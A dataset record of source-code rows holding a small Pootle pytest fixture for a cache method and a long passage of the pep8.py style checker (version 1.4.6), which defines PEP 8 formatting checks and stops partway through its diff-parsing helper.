code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import pytest
@pytest.fixture(scope='session', autouse=True)
def delete_pattern():
"""Adds the no-op `delete_pattern()` method to `LocMemCache`."""
from django.core.cache.backends.locmem import LocMemCache
LocMemCache.delete_pattern = lambda x, y: 0
| Avira/pootle | tests/fixtures/cache.py | Python | gpl-3.0 | 562 |
#!/usr/bin/env python
# pep8.py - Check Python source code formatting, according to PEP 8
# Copyright (C) 2006-2009 Johann C. Rocholl <johann@rocholl.net>
# Copyright (C) 2009-2013 Florent Xicluna <florent.xicluna@gmail.com>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
r"""
Check Python source code formatting, according to PEP 8:
http://www.python.org/dev/peps/pep-0008/
For usage and a list of options, try this:
$ python pep8.py -h
This program and its regression test suite live here:
http://github.com/jcrocholl/pep8
Groups of errors and warnings:
E errors
W warnings
100 indentation
200 whitespace
300 blank lines
400 imports
500 line length
600 deprecation
700 statements
900 syntax error
"""
__version__ = '1.4.6'
import os
import sys
import re
import time
import inspect
import keyword
import tokenize
from optparse import OptionParser
from fnmatch import fnmatch
try:
from configparser import RawConfigParser
from io import TextIOWrapper
except ImportError:
from ConfigParser import RawConfigParser
DEFAULT_EXCLUDE = '.svn,CVS,.bzr,.hg,.git,__pycache__'
DEFAULT_IGNORE = 'E123,E226,E24'
if sys.platform == 'win32':
DEFAULT_CONFIG = os.path.expanduser(r'~\.pep8')
else:
DEFAULT_CONFIG = os.path.join(os.getenv('XDG_CONFIG_HOME') or
os.path.expanduser('~/.config'), 'pep8')
PROJECT_CONFIG = ('setup.cfg', 'tox.ini', '.pep8')
TESTSUITE_PATH = os.path.join(os.path.dirname(__file__), 'testsuite')
MAX_LINE_LENGTH = 79
REPORT_FORMAT = {
'default': '%(path)s:%(row)d:%(col)d: %(code)s %(text)s',
'pylint': '%(path)s:%(row)d: [%(code)s] %(text)s',
}
PyCF_ONLY_AST = 1024
SINGLETONS = frozenset(['False', 'None', 'True'])
KEYWORDS = frozenset(keyword.kwlist + ['print']) - SINGLETONS
UNARY_OPERATORS = frozenset(['>>', '**', '*', '+', '-'])
ARITHMETIC_OP = frozenset(['**', '*', '/', '//', '+', '-'])
WS_OPTIONAL_OPERATORS = ARITHMETIC_OP.union(['^', '&', '|', '<<', '>>', '%'])
WS_NEEDED_OPERATORS = frozenset([
'**=', '*=', '/=', '//=', '+=', '-=', '!=', '<>', '<', '>',
'%=', '^=', '&=', '|=', '==', '<=', '>=', '<<=', '>>=', '='])
WHITESPACE = frozenset(' \t')
SKIP_TOKENS = frozenset([tokenize.COMMENT, tokenize.NL, tokenize.NEWLINE,
tokenize.INDENT, tokenize.DEDENT])
BENCHMARK_KEYS = ['directories', 'files', 'logical lines', 'physical lines']
INDENT_REGEX = re.compile(r'([ \t]*)')
RAISE_COMMA_REGEX = re.compile(r'raise\s+\w+\s*,')
RERAISE_COMMA_REGEX = re.compile(r'raise\s+\w+\s*,\s*\w+\s*,\s*\w+')
ERRORCODE_REGEX = re.compile(r'\b[A-Z]\d{3}\b')
DOCSTRING_REGEX = re.compile(r'u?r?["\']')
EXTRANEOUS_WHITESPACE_REGEX = re.compile(r'[[({] | []}),;:]')
WHITESPACE_AFTER_COMMA_REGEX = re.compile(r'[,;:]\s*(?: |\t)')
COMPARE_SINGLETON_REGEX = re.compile(r'([=!]=)\s*(None|False|True)')
COMPARE_TYPE_REGEX = re.compile(r'(?:[=!]=|is(?:\s+not)?)\s*type(?:s.\w+Type'
r'|\s*\(\s*([^)]*[^ )])\s*\))')
KEYWORD_REGEX = re.compile(r'(\s*)\b(?:%s)\b(\s*)' % r'|'.join(KEYWORDS))
OPERATOR_REGEX = re.compile(r'(?:[^,\s])(\s*)(?:[-+*/|!<=>%&^]+)(\s*)')
LAMBDA_REGEX = re.compile(r'\blambda\b')
HUNK_REGEX = re.compile(r'^@@ -\d+(?:,\d+)? \+(\d+)(?:,(\d+))? @@.*$')
# Work around Python < 2.6 behaviour, which does not generate NL after
# a comment which is on a line by itself.
COMMENT_WITH_NL = tokenize.generate_tokens(['#\n'].pop).send(None)[1] == '#\n'
##############################################################################
# Plugins (check functions) for physical lines
##############################################################################
def tabs_or_spaces(physical_line, indent_char):
r"""
Never mix tabs and spaces.
The most popular way of indenting Python is with spaces only. The
second-most popular way is with tabs only. Code indented with a mixture
of tabs and spaces should be converted to using spaces exclusively. When
invoking the Python command line interpreter with the -t option, it issues
warnings about code that illegally mixes tabs and spaces. When using -tt
these warnings become errors. These options are highly recommended!
Okay: if a == 0:\n a = 1\n b = 1
E101: if a == 0:\n a = 1\n\tb = 1
"""
indent = INDENT_REGEX.match(physical_line).group(1)
for offset, char in enumerate(indent):
if char != indent_char:
return offset, "E101 indentation contains mixed spaces and tabs"
def tabs_obsolete(physical_line):
r"""
For new projects, spaces-only are strongly recommended over tabs. Most
editors have features that make this easy to do.
Okay: if True:\n return
W191: if True:\n\treturn
"""
indent = INDENT_REGEX.match(physical_line).group(1)
if '\t' in indent:
return indent.index('\t'), "W191 indentation contains tabs"
def trailing_whitespace(physical_line):
r"""
JCR: Trailing whitespace is superfluous.
FBM: Except when it occurs as part of a blank line (i.e. the line is
nothing but whitespace). According to Python docs[1] a line with only
whitespace is considered a blank line, and is to be ignored. However,
matching a blank line to its indentation level avoids mistakenly
terminating a multi-line statement (e.g. class declaration) when
pasting code into the standard Python interpreter.
[1] http://docs.python.org/reference/lexical_analysis.html#blank-lines
The warning returned varies on whether the line itself is blank, for easier
filtering for those who want to indent their blank lines.
Okay: spam(1)\n#
W291: spam(1) \n#
W293: class Foo(object):\n \n bang = 12
"""
physical_line = physical_line.rstrip('\n') # chr(10), newline
physical_line = physical_line.rstrip('\r') # chr(13), carriage return
physical_line = physical_line.rstrip('\x0c') # chr(12), form feed, ^L
stripped = physical_line.rstrip(' \t\v')
if physical_line != stripped:
if stripped:
return len(stripped), "W291 trailing whitespace"
else:
return 0, "W293 blank line contains whitespace"
def trailing_blank_lines(physical_line, lines, line_number):
r"""
JCR: Trailing blank lines are superfluous.
Okay: spam(1)
W391: spam(1)\n
"""
if not physical_line.rstrip() and line_number == len(lines):
return 0, "W391 blank line at end of file"
def missing_newline(physical_line):
"""
JCR: The last line should have a newline.
Reports warning W292.
"""
if physical_line.rstrip() == physical_line:
return len(physical_line), "W292 no newline at end of file"
def maximum_line_length(physical_line, max_line_length):
"""
Limit all lines to a maximum of 79 characters.
There are still many devices around that are limited to 80 character
lines; plus, limiting windows to 80 characters makes it possible to have
several windows side-by-side. The default wrapping on such devices looks
ugly. Therefore, please limit all lines to a maximum of 79 characters.
For flowing long blocks of text (docstrings or comments), limiting the
length to 72 characters is recommended.
Reports error E501.
"""
line = physical_line.rstrip()
length = len(line)
if length > max_line_length and not noqa(line):
if hasattr(line, 'decode'): # Python 2
# The line could contain multi-byte characters
try:
length = len(line.decode('utf-8'))
except UnicodeError:
pass
if length > max_line_length:
return (max_line_length, "E501 line too long "
"(%d > %d characters)" % (length, max_line_length))
##############################################################################
# Plugins (check functions) for logical lines
##############################################################################
def blank_lines(logical_line, blank_lines, indent_level, line_number,
previous_logical, previous_indent_level):
r"""
Separate top-level function and class definitions with two blank lines.
Method definitions inside a class are separated by a single blank line.
Extra blank lines may be used (sparingly) to separate groups of related
functions. Blank lines may be omitted between a bunch of related
one-liners (e.g. a set of dummy implementations).
Use blank lines in functions, sparingly, to indicate logical sections.
Okay: def a():\n pass\n\n\ndef b():\n pass
Okay: def a():\n pass\n\n\n# Foo\n# Bar\n\ndef b():\n pass
E301: class Foo:\n b = 0\n def bar():\n pass
E302: def a():\n pass\n\ndef b(n):\n pass
E303: def a():\n pass\n\n\n\ndef b(n):\n pass
E303: def a():\n\n\n\n pass
E304: @decorator\n\ndef a():\n pass
"""
if line_number < 3 and not previous_logical:
return # Don't expect blank lines before the first line
if previous_logical.startswith('@'):
if blank_lines:
yield 0, "E304 blank lines found after function decorator"
elif blank_lines > 2 or (indent_level and blank_lines == 2):
yield 0, "E303 too many blank lines (%d)" % blank_lines
elif logical_line.startswith(('def ', 'class ', '@')):
if indent_level:
if not (blank_lines or previous_indent_level < indent_level or
DOCSTRING_REGEX.match(previous_logical)):
yield 0, "E301 expected 1 blank line, found 0"
elif blank_lines != 2:
yield 0, "E302 expected 2 blank lines, found %d" % blank_lines
def extraneous_whitespace(logical_line):
"""
Avoid extraneous whitespace in the following situations:
- Immediately inside parentheses, brackets or braces.
- Immediately before a comma, semicolon, or colon.
Okay: spam(ham[1], {eggs: 2})
E201: spam( ham[1], {eggs: 2})
E201: spam(ham[ 1], {eggs: 2})
E201: spam(ham[1], { eggs: 2})
E202: spam(ham[1], {eggs: 2} )
E202: spam(ham[1 ], {eggs: 2})
E202: spam(ham[1], {eggs: 2 })
E203: if x == 4: print x, y; x, y = y , x
E203: if x == 4: print x, y ; x, y = y, x
E203: if x == 4 : print x, y; x, y = y, x
"""
line = logical_line
for match in EXTRANEOUS_WHITESPACE_REGEX.finditer(line):
text = match.group()
char = text.strip()
found = match.start()
if text == char + ' ':
# assert char in '([{'
yield found + 1, "E201 whitespace after '%s'" % char
elif line[found - 1] != ',':
code = ('E202' if char in '}])' else 'E203') # if char in ',;:'
yield found, "%s whitespace before '%s'" % (code, char)
def whitespace_around_keywords(logical_line):
r"""
Avoid extraneous whitespace around keywords.
Okay: True and False
E271: True and False
E272: True and False
E273: True and\tFalse
E274: True\tand False
"""
for match in KEYWORD_REGEX.finditer(logical_line):
before, after = match.groups()
if '\t' in before:
yield match.start(1), "E274 tab before keyword"
elif len(before) > 1:
yield match.start(1), "E272 multiple spaces before keyword"
if '\t' in after:
yield match.start(2), "E273 tab after keyword"
elif len(after) > 1:
yield match.start(2), "E271 multiple spaces after keyword"
def missing_whitespace(logical_line):
"""
JCR: Each comma, semicolon or colon should be followed by whitespace.
Okay: [a, b]
Okay: (3,)
Okay: a[1:4]
Okay: a[:4]
Okay: a[1:]
Okay: a[1:4:2]
E231: ['a','b']
E231: foo(bar,baz)
E231: [{'a':'b'}]
"""
line = logical_line
for index in range(len(line) - 1):
char = line[index]
if char in ',;:' and line[index + 1] not in WHITESPACE:
before = line[:index]
if char == ':' and before.count('[') > before.count(']') and \
before.rfind('{') < before.rfind('['):
continue # Slice syntax, no space required
if char == ',' and line[index + 1] == ')':
continue # Allow tuple with only one element: (3,)
yield index, "E231 missing whitespace after '%s'" % char
def indentation(logical_line, previous_logical, indent_char,
indent_level, previous_indent_level):
r"""
Use 4 spaces per indentation level.
For really old code that you don't want to mess up, you can continue to
use 8-space tabs.
Okay: a = 1
Okay: if a == 0:\n a = 1
E111: a = 1
Okay: for item in items:\n pass
E112: for item in items:\npass
Okay: a = 1\nb = 2
E113: a = 1\n b = 2
"""
if indent_char == ' ' and indent_level % 4:
yield 0, "E111 indentation is not a multiple of four"
indent_expect = previous_logical.endswith(':')
if indent_expect and indent_level <= previous_indent_level:
yield 0, "E112 expected an indented block"
if indent_level > previous_indent_level and not indent_expect:
yield 0, "E113 unexpected indentation"
def continued_indentation(logical_line, tokens, indent_level, hang_closing,
noqa, verbose):
r"""
Continuation lines should align wrapped elements either vertically using
Python's implicit line joining inside parentheses, brackets and braces, or
using a hanging indent.
When using a hanging indent the following considerations should be applied:
- there should be no arguments on the first line, and
- further indentation should be used to clearly distinguish itself as a
continuation line.
Okay: a = (\n)
E123: a = (\n )
Okay: a = (\n 42)
E121: a = (\n 42)
E122: a = (\n42)
E123: a = (\n 42\n )
E124: a = (24,\n 42\n)
E125: if (a or\n b):\n pass
E126: a = (\n 42)
E127: a = (24,\n 42)
E128: a = (24,\n 42)
"""
first_row = tokens[0][2][0]
nrows = 1 + tokens[-1][2][0] - first_row
if noqa or nrows == 1:
return
# indent_next tells us whether the next block is indented; assuming
# that it is indented by 4 spaces, then we should not allow 4-space
# indents on the final continuation line; in turn, some other
# indents are allowed to have an extra 4 spaces.
indent_next = logical_line.endswith(':')
row = depth = 0
# remember how many brackets were opened on each line
parens = [0] * nrows
# relative indents of physical lines
rel_indent = [0] * nrows
# visual indents
indent_chances = {}
last_indent = tokens[0][2]
indent = [last_indent[1]]
if verbose >= 3:
print(">>> " + tokens[0][4].rstrip())
for token_type, text, start, end, line in tokens:
newline = row < start[0] - first_row
if newline:
row = start[0] - first_row
newline = (not last_token_multiline and
token_type not in (tokenize.NL, tokenize.NEWLINE))
if newline:
# this is the beginning of a continuation line.
last_indent = start
if verbose >= 3:
print("... " + line.rstrip())
# record the initial indent.
rel_indent[row] = expand_indent(line) - indent_level
if depth:
# a bracket expression in a continuation line.
# find the line that it was opened on
for open_row in range(row - 1, -1, -1):
if parens[open_row]:
break
else:
# an unbracketed continuation line (ie, backslash)
open_row = 0
hang = rel_indent[row] - rel_indent[open_row]
close_bracket = (token_type == tokenize.OP and text in ']})')
visual_indent = (not close_bracket and hang > 0 and
indent_chances.get(start[1]))
if close_bracket and indent[depth]:
# closing bracket for visual indent
if start[1] != indent[depth]:
yield (start, "E124 closing bracket does not match "
"visual indentation")
elif close_bracket and not hang:
# closing bracket matches indentation of opening bracket's line
if hang_closing:
yield start, "E133 closing bracket is missing indentation"
elif visual_indent is True:
# visual indent is verified
if not indent[depth]:
indent[depth] = start[1]
elif visual_indent in (text, str):
# ignore token lined up with matching one from a previous line
pass
elif indent[depth] and start[1] < indent[depth]:
# visual indent is broken
yield (start, "E128 continuation line "
"under-indented for visual indent")
elif hang == 4 or (indent_next and rel_indent[row] == 8):
# hanging indent is verified
if close_bracket and not hang_closing:
yield (start, "E123 closing bracket does not match "
"indentation of opening bracket's line")
else:
# indent is broken
if hang <= 0:
error = "E122", "missing indentation or outdented"
elif indent[depth]:
error = "E127", "over-indented for visual indent"
elif hang % 4:
error = "E121", "indentation is not a multiple of four"
else:
error = "E126", "over-indented for hanging indent"
yield start, "%s continuation line %s" % error
# look for visual indenting
if (parens[row] and token_type not in (tokenize.NL, tokenize.COMMENT)
and not indent[depth]):
indent[depth] = start[1]
indent_chances[start[1]] = True
if verbose >= 4:
print("bracket depth %s indent to %s" % (depth, start[1]))
# deal with implicit string concatenation
elif (token_type in (tokenize.STRING, tokenize.COMMENT) or
text in ('u', 'ur', 'b', 'br')):
indent_chances[start[1]] = str
# special case for the "if" statement because len("if (") == 4
elif not indent_chances and not row and not depth and text == 'if':
indent_chances[end[1] + 1] = True
# keep track of bracket depth
if token_type == tokenize.OP:
if text in '([{':
depth += 1
indent.append(0)
parens[row] += 1
if verbose >= 4:
print("bracket depth %s seen, col %s, visual min = %s" %
(depth, start[1], indent[depth]))
elif text in ')]}' and depth > 0:
# parent indents should not be more than this one
prev_indent = indent.pop() or last_indent[1]
for d in range(depth):
if indent[d] > prev_indent:
indent[d] = 0
for ind in list(indent_chances):
if ind >= prev_indent:
del indent_chances[ind]
depth -= 1
if depth:
indent_chances[indent[depth]] = True
for idx in range(row, -1, -1):
if parens[idx]:
parens[idx] -= 1
rel_indent[row] = rel_indent[idx]
break
assert len(indent) == depth + 1
if start[1] not in indent_chances:
# allow to line up tokens
indent_chances[start[1]] = text
last_token_multiline = (start[0] != end[0])
if indent_next and expand_indent(line) == indent_level + 4:
yield (last_indent, "E125 continuation line does not distinguish "
"itself from next logical line")
def whitespace_before_parameters(logical_line, tokens):
"""
Avoid extraneous whitespace in the following situations:
- Immediately before the open parenthesis that starts the argument
list of a function call.
- Immediately before the open parenthesis that starts an indexing or
slicing.
Okay: spam(1)
E211: spam (1)
Okay: dict['key'] = list[index]
E211: dict ['key'] = list[index]
E211: dict['key'] = list [index]
"""
prev_type, prev_text, __, prev_end, __ = tokens[0]
for index in range(1, len(tokens)):
token_type, text, start, end, __ = tokens[index]
if (token_type == tokenize.OP and
text in '([' and
start != prev_end and
(prev_type == tokenize.NAME or prev_text in '}])') and
# Syntax "class A (B):" is allowed, but avoid it
(index < 2 or tokens[index - 2][1] != 'class') and
# Allow "return (a.foo for a in range(5))"
not keyword.iskeyword(prev_text)):
yield prev_end, "E211 whitespace before '%s'" % text
prev_type = token_type
prev_text = text
prev_end = end
def whitespace_around_operator(logical_line):
r"""
Avoid extraneous whitespace in the following situations:
- More than one space around an assignment (or other) operator to
align it with another.
Okay: a = 12 + 3
E221: a = 4 + 5
E222: a = 4 + 5
E223: a = 4\t+ 5
E224: a = 4 +\t5
"""
for match in OPERATOR_REGEX.finditer(logical_line):
before, after = match.groups()
if '\t' in before:
yield match.start(1), "E223 tab before operator"
elif len(before) > 1:
yield match.start(1), "E221 multiple spaces before operator"
if '\t' in after:
yield match.start(2), "E224 tab after operator"
elif len(after) > 1:
yield match.start(2), "E222 multiple spaces after operator"
def missing_whitespace_around_operator(logical_line, tokens):
r"""
- Always surround these binary operators with a single space on
either side: assignment (=), augmented assignment (+=, -= etc.),
comparisons (==, <, >, !=, <>, <=, >=, in, not in, is, is not),
Booleans (and, or, not).
- Use spaces around arithmetic operators.
Okay: i = i + 1
Okay: submitted += 1
Okay: x = x * 2 - 1
Okay: hypot2 = x * x + y * y
Okay: c = (a + b) * (a - b)
Okay: foo(bar, key='word', *args, **kwargs)
Okay: alpha[:-i]
E225: i=i+1
E225: submitted +=1
E225: x = x /2 - 1
E225: z = x **y
E226: c = (a+b) * (a-b)
E226: hypot2 = x*x + y*y
E227: c = a|b
E228: msg = fmt%(errno, errmsg)
"""
parens = 0
need_space = False
prev_type = tokenize.OP
prev_text = prev_end = None
for token_type, text, start, end, line in tokens:
if token_type in (tokenize.NL, tokenize.NEWLINE, tokenize.ERRORTOKEN):
# ERRORTOKEN is triggered by backticks in Python 3
continue
if text in ('(', 'lambda'):
parens += 1
elif text == ')':
parens -= 1
if need_space:
if start != prev_end:
# Found a (probably) needed space
if need_space is not True and not need_space[1]:
yield (need_space[0],
"E225 missing whitespace around operator")
need_space = False
elif text == '>' and prev_text in ('<', '-'):
# Tolerate the "<>" operator, even if running Python 3
# Deal with Python 3's annotated return value "->"
pass
else:
if need_space is True or need_space[1]:
# A needed trailing space was not found
yield prev_end, "E225 missing whitespace around operator"
else:
code, optype = 'E226', 'arithmetic'
if prev_text == '%':
code, optype = 'E228', 'modulo'
elif prev_text not in ARITHMETIC_OP:
code, optype = 'E227', 'bitwise or shift'
yield (need_space[0], "%s missing whitespace "
"around %s operator" % (code, optype))
need_space = False
elif token_type == tokenize.OP and prev_end is not None:
if text == '=' and parens:
# Allow keyword args or defaults: foo(bar=None).
pass
elif text in WS_NEEDED_OPERATORS:
need_space = True
elif text in UNARY_OPERATORS:
# Check if the operator is being used as a binary operator
# Allow unary operators: -123, -x, +1.
# Allow argument unpacking: foo(*args, **kwargs).
if prev_type == tokenize.OP:
binary_usage = (prev_text in '}])')
elif prev_type == tokenize.NAME:
binary_usage = (prev_text not in KEYWORDS)
else:
binary_usage = (prev_type not in SKIP_TOKENS)
if binary_usage:
need_space = None
elif text in WS_OPTIONAL_OPERATORS:
need_space = None
if need_space is None:
# Surrounding space is optional, but ensure that
# trailing space matches opening space
need_space = (prev_end, start != prev_end)
elif need_space and start == prev_end:
# A needed opening space was not found
yield prev_end, "E225 missing whitespace around operator"
need_space = False
prev_type = token_type
prev_text = text
prev_end = end
def whitespace_around_comma(logical_line):
r"""
Avoid extraneous whitespace in the following situations:
- More than one space around an assignment (or other) operator to
align it with another.
Note: these checks are disabled by default
Okay: a = (1, 2)
E241: a = (1, 2)
E242: a = (1,\t2)
"""
line = logical_line
for m in WHITESPACE_AFTER_COMMA_REGEX.finditer(line):
found = m.start() + 1
if '\t' in m.group():
yield found, "E242 tab after '%s'" % m.group()[0]
else:
yield found, "E241 multiple spaces after '%s'" % m.group()[0]
def whitespace_around_named_parameter_equals(logical_line, tokens):
"""
Don't use spaces around the '=' sign when used to indicate a
keyword argument or a default parameter value.
Okay: def complex(real, imag=0.0):
Okay: return magic(r=real, i=imag)
Okay: boolean(a == b)
Okay: boolean(a != b)
Okay: boolean(a <= b)
Okay: boolean(a >= b)
E251: def complex(real, imag = 0.0):
E251: return magic(r = real, i = imag)
"""
parens = 0
no_space = False
prev_end = None
message = "E251 unexpected spaces around keyword / parameter equals"
for token_type, text, start, end, line in tokens:
if no_space:
no_space = False
if start != prev_end:
yield (prev_end, message)
elif token_type == tokenize.OP:
if text == '(':
parens += 1
elif text == ')':
parens -= 1
elif parens and text == '=':
no_space = True
if start != prev_end:
yield (prev_end, message)
prev_end = end
def whitespace_before_inline_comment(logical_line, tokens):
"""
Separate inline comments by at least two spaces.
An inline comment is a comment on the same line as a statement. Inline
comments should be separated by at least two spaces from the statement.
They should start with a # and a single space.
Okay: x = x + 1 # Increment x
Okay: x = x + 1 # Increment x
E261: x = x + 1 # Increment x
E262: x = x + 1 #Increment x
E262: x = x + 1 # Increment x
"""
prev_end = (0, 0)
for token_type, text, start, end, line in tokens:
if token_type == tokenize.COMMENT:
if not line[:start[1]].strip():
continue
if prev_end[0] == start[0] and start[1] < prev_end[1] + 2:
yield (prev_end,
"E261 at least two spaces before inline comment")
symbol, sp, comment = text.partition(' ')
if symbol not in ('#', '#:') or comment[:1].isspace():
yield start, "E262 inline comment should start with '# '"
elif token_type != tokenize.NL:
prev_end = end
def imports_on_separate_lines(logical_line):
r"""
Imports should usually be on separate lines.
Okay: import os\nimport sys
E401: import sys, os
Okay: from subprocess import Popen, PIPE
Okay: from myclas import MyClass
Okay: from foo.bar.yourclass import YourClass
Okay: import myclass
Okay: import foo.bar.yourclass
"""
line = logical_line
if line.startswith('import '):
found = line.find(',')
if -1 < found and ';' not in line[:found]:
yield found, "E401 multiple imports on one line"
def compound_statements(logical_line):
r"""
Compound statements (multiple statements on the same line) are
generally discouraged.
While sometimes it's okay to put an if/for/while with a small body
on the same line, never do this for multi-clause statements. Also
avoid folding such long lines!
Okay: if foo == 'blah':\n do_blah_thing()
Okay: do_one()
Okay: do_two()
Okay: do_three()
E701: if foo == 'blah': do_blah_thing()
E701: for x in lst: total += x
E701: while t < 10: t = delay()
E701: if foo == 'blah': do_blah_thing()
E701: else: do_non_blah_thing()
E701: try: something()
E701: finally: cleanup()
E701: if foo == 'blah': one(); two(); three()
E702: do_one(); do_two(); do_three()
E703: do_four(); # useless semicolon
"""
line = logical_line
last_char = len(line) - 1
found = line.find(':')
while -1 < found < last_char:
before = line[:found]
if (before.count('{') <= before.count('}') and # {'a': 1} (dict)
before.count('[') <= before.count(']') and # [1:2] (slice)
before.count('(') <= before.count(')') and # (Python 3 annotation)
not LAMBDA_REGEX.search(before)): # lambda x: x
yield found, "E701 multiple statements on one line (colon)"
found = line.find(':', found + 1)
found = line.find(';')
while -1 < found:
if found < last_char:
yield found, "E702 multiple statements on one line (semicolon)"
else:
yield found, "E703 statement ends with a semicolon"
found = line.find(';', found + 1)
def explicit_line_join(logical_line, tokens):
r"""
Avoid explicit line join between brackets.
The preferred way of wrapping long lines is by using Python's implied line
continuation inside parentheses, brackets and braces. Long lines can be
broken over multiple lines by wrapping expressions in parentheses. These
should be used in preference to using a backslash for line continuation.
E502: aaa = [123, \\n 123]
E502: aaa = ("bbb " \\n "ccc")
Okay: aaa = [123,\n 123]
Okay: aaa = ("bbb "\n "ccc")
Okay: aaa = "bbb " \\n "ccc"
"""
prev_start = prev_end = parens = 0
for token_type, text, start, end, line in tokens:
if start[0] != prev_start and parens and backslash:
yield backslash, "E502 the backslash is redundant between brackets"
if end[0] != prev_end:
if line.rstrip('\r\n').endswith('\\'):
backslash = (end[0], len(line.splitlines()[-1]) - 1)
else:
backslash = None
prev_start = prev_end = end[0]
else:
prev_start = start[0]
if token_type == tokenize.OP:
if text in '([{':
parens += 1
elif text in ')]}':
parens -= 1
def comparison_to_singleton(logical_line, noqa):
"""
Comparisons to singletons like None should always be done
with "is" or "is not", never the equality operators.
Okay: if arg is not None:
E711: if arg != None:
E712: if arg == True:
Also, beware of writing if x when you really mean if x is not None --
e.g. when testing whether a variable or argument that defaults to None was
set to some other value. The other value might have a type (such as a
container) that could be false in a boolean context!
"""
match = not noqa and COMPARE_SINGLETON_REGEX.search(logical_line)
if match:
same = (match.group(1) == '==')
singleton = match.group(2)
msg = "'if cond is %s:'" % (('' if same else 'not ') + singleton)
if singleton in ('None',):
code = 'E711'
else:
code = 'E712'
nonzero = ((singleton == 'True' and same) or
(singleton == 'False' and not same))
msg += " or 'if %scond:'" % ('' if nonzero else 'not ')
yield match.start(1), ("%s comparison to %s should be %s" %
(code, singleton, msg))
def comparison_type(logical_line):
"""
Object type comparisons should always use isinstance() instead of
comparing types directly.
Okay: if isinstance(obj, int):
E721: if type(obj) is type(1):
When checking if an object is a string, keep in mind that it might be a
unicode string too! In Python 2.3, str and unicode have a common base
class, basestring, so you can do:
Okay: if isinstance(obj, basestring):
Okay: if type(a1) is type(b1):
"""
match = COMPARE_TYPE_REGEX.search(logical_line)
if match:
inst = match.group(1)
if inst and isidentifier(inst) and inst not in SINGLETONS:
return # Allow comparison for types which are not obvious
yield match.start(), "E721 do not compare types, use 'isinstance()'"
def python_3000_has_key(logical_line):
r"""
The {}.has_key() method is removed in the Python 3.
Use the 'in' operation instead.
Okay: if "alph" in d:\n print d["alph"]
W601: assert d.has_key('alph')
"""
pos = logical_line.find('.has_key(')
if pos > -1:
yield pos, "W601 .has_key() is deprecated, use 'in'"
def python_3000_raise_comma(logical_line):
"""
When raising an exception, use "raise ValueError('message')"
instead of the older form "raise ValueError, 'message'".
The paren-using form is preferred because when the exception arguments
are long or include string formatting, you don't need to use line
continuation characters thanks to the containing parentheses. The older
form is removed in Python 3.
Okay: raise DummyError("Message")
W602: raise DummyError, "Message"
"""
match = RAISE_COMMA_REGEX.match(logical_line)
if match and not RERAISE_COMMA_REGEX.match(logical_line):
yield match.end() - 1, "W602 deprecated form of raising exception"
def python_3000_not_equal(logical_line):
"""
!= can also be written <>, but this is an obsolete usage kept for
backwards compatibility only. New code should always use !=.
The older syntax is removed in Python 3.
Okay: if a != 'no':
W603: if a <> 'no':
"""
pos = logical_line.find('<>')
if pos > -1:
yield pos, "W603 '<>' is deprecated, use '!='"
def python_3000_backticks(logical_line):
"""
Backticks are removed in Python 3.
Use repr() instead.
Okay: val = repr(1 + 2)
W604: val = `1 + 2`
"""
pos = logical_line.find('`')
if pos > -1:
yield pos, "W604 backticks are deprecated, use 'repr()'"
##############################################################################
# Helper functions
##############################################################################
if '' == ''.encode():
# Python 2: implicit encoding.
def readlines(filename):
f = open(filename)
try:
return f.readlines()
finally:
f.close()
isidentifier = re.compile(r'[a-zA-Z_]\w*').match
stdin_get_value = sys.stdin.read
else:
# Python 3
def readlines(filename):
f = open(filename, 'rb')
try:
coding, lines = tokenize.detect_encoding(f.readline)
f = TextIOWrapper(f, coding, line_buffering=True)
return [l.decode(coding) for l in lines] + f.readlines()
except (LookupError, SyntaxError, UnicodeError):
f.close()
# Fall back if files are improperly declared
f = open(filename, encoding='latin-1')
return f.readlines()
finally:
f.close()
isidentifier = str.isidentifier
def stdin_get_value():
return TextIOWrapper(sys.stdin.buffer, errors='ignore').read()
readlines.__doc__ = " Read the source code."
noqa = re.compile(r'# no(?:qa|pep8)\b', re.I).search
def expand_indent(line):
r"""
Return the amount of indentation.
Tabs are expanded to the next multiple of 8.
>>> expand_indent(' ')
4
>>> expand_indent('\t')
8
>>> expand_indent(' \t')
8
>>> expand_indent(' \t')
8
>>> expand_indent(' \t')
16
"""
if '\t' not in line:
return len(line) - len(line.lstrip())
result = 0
for char in line:
if char == '\t':
result = result // 8 * 8 + 8
elif char == ' ':
result += 1
else:
break
return result
def mute_string(text):
"""
Replace contents with 'xxx' to prevent syntax matching.
>>> mute_string('"abc"')
'"xxx"'
>>> mute_string("'''abc'''")
"'''xxx'''"
>>> mute_string("r'abc'")
"r'xxx'"
"""
# String modifiers (e.g. u or r)
start = text.index(text[-1]) + 1
end = len(text) - 1
# Triple quotes
if text[-3:] in ('"""', "'''"):
start += 2
end -= 2
return text[:start] + 'x' * (end - start) + text[end:]
def parse_udiff(diff, patterns=None, parent='.'):
"""Return a dictionary of matching lines."""
# For each file of the diff, the entry key is the filename,
# and the value is a set of row numbers to consider.
rv = {}
path = nrows = None
for line in diff.splitlines():
if nrows:
if line[:1] != '-':
nrows -= 1
continue
if line[:3] == '@@ ':
hunk_match = HUNK_REGEX.match(line)
row, nrows = [int(g or '1') for g in hunk_match.groups()]
rv[path].update(range(row, row + nrows))
elif line[:3] == '+++':
path = line[4:].split('\t', 1)[0]
if path[:2] == 'b/':
path = path[2:]
